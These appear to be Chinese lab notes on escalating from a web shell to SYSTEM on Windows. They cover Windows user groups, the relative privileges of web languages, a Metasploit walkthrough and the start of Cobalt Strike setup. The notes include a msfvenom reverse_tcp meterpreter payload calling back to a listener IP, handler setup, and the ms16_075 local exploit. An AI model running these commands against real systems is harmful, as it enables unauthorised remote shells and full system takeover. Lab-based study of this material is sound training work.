#Web到Win系统提权-平台&语言&用户

1、Web搭建平台差异

集成软件，自行搭建，虚拟化等

集成软件：宝塔，PhpStudy，XAMMP等

自行搭建：自己一个个下载安装搭建配置

虚拟化：Docker，ESXi，QEMU，Hyper-V等

 

2、Web语言权限差异

ASP/ASP.NET/PHP/JSP等

权限高低：JSP>ASP.NET>ASP=PHP

 

3、系统用户权限差异

Windows：

System：系统组，拥有管理系统资源的权限，包括文件、目录和注册表等。

Administrators：管理员组，具有对计算机进行完全访问和操作的权限。

Users：用户组，一般用户的默认组别，拥有较低的系统权限。

Guests：

访客组，可以访问计算机上的公共文件夹和打印机，但不能更改配置和安装程序。

Backup Operators：

备份操作员组，允许用户备份和还原数据，但不能更改配置安装程序。

Power Users：高级用户组，拥有比一般用户更高的系统权限，但比管理员组权限低。

Remote Desktop Users：远程桌面用户组，允许用户进行远程桌面连接。

Network Configuration Operators：网络配置操作员组，允许用户管理网络配置。

Performance Log Users：性能日志用户组，允许用户收集性能日志和计数器数据。

Distributed COM Users：

分布式 COM 用户组，允许用户使用分布式 COM 连接到计算机。

IIS_IUSRS: 用于授权IIS相关服务的用户组。

 

Linux：

系统用户：UID(0-999)

普通用户：UID(1000-*)

root用户：UID为0，拥有系统的完全控制权限

#Web到Win-系统提权-宝塔面板-哥斯拉

Windows 2012(宝塔Apache+PHP)-MSF

复现搭建：选择2012系统后自行安装宝塔

PMeterpreter

BypassOpenBaseDir

BypassDisableFunction

 

#Web到Win-系统提权-溢出漏洞-MSF&CS

Windows 2008(IIS+ASP)-MSF

自行搭建+ASP/PHP+Windows 2008

复现搭建：选择2016系统后自行安装IIS+ASP

0、MSF安装：（也可以用kali）

目前的msf版本有bug可以TB上购买pro版本嘎嘎稳

https://blog.csdn.net/qq_46717339/article/details/122653084

1、生成反弹后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.141 LPORT=3333 -f exe -o msf.exe   ----需要设置要接收反弹的本地IP地址

2、配置监听会话

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 3333

exploit

2.1、筛选EXP模块

全自动：快速识别系统中可能被利用的漏洞

use post/multi/recon/local_exploit_suggester

set showdescription true

3、利用EXP溢出提权

background

use exploit/windows/local/ms16_075_reflection_juicy

set session 1

exploit

 

执行whoami就可以获取到system

Windows 2016(IIS+ASP.NET)-CS

复现搭建：选择2016系统后自行安装IIS+ASP.NET

0、CS安装

chmod +x ./teamserver

chmod +x ./TeamServerImage

./teamserver IP password

1、连接CS

2、创建监听器

3、加载脚本插件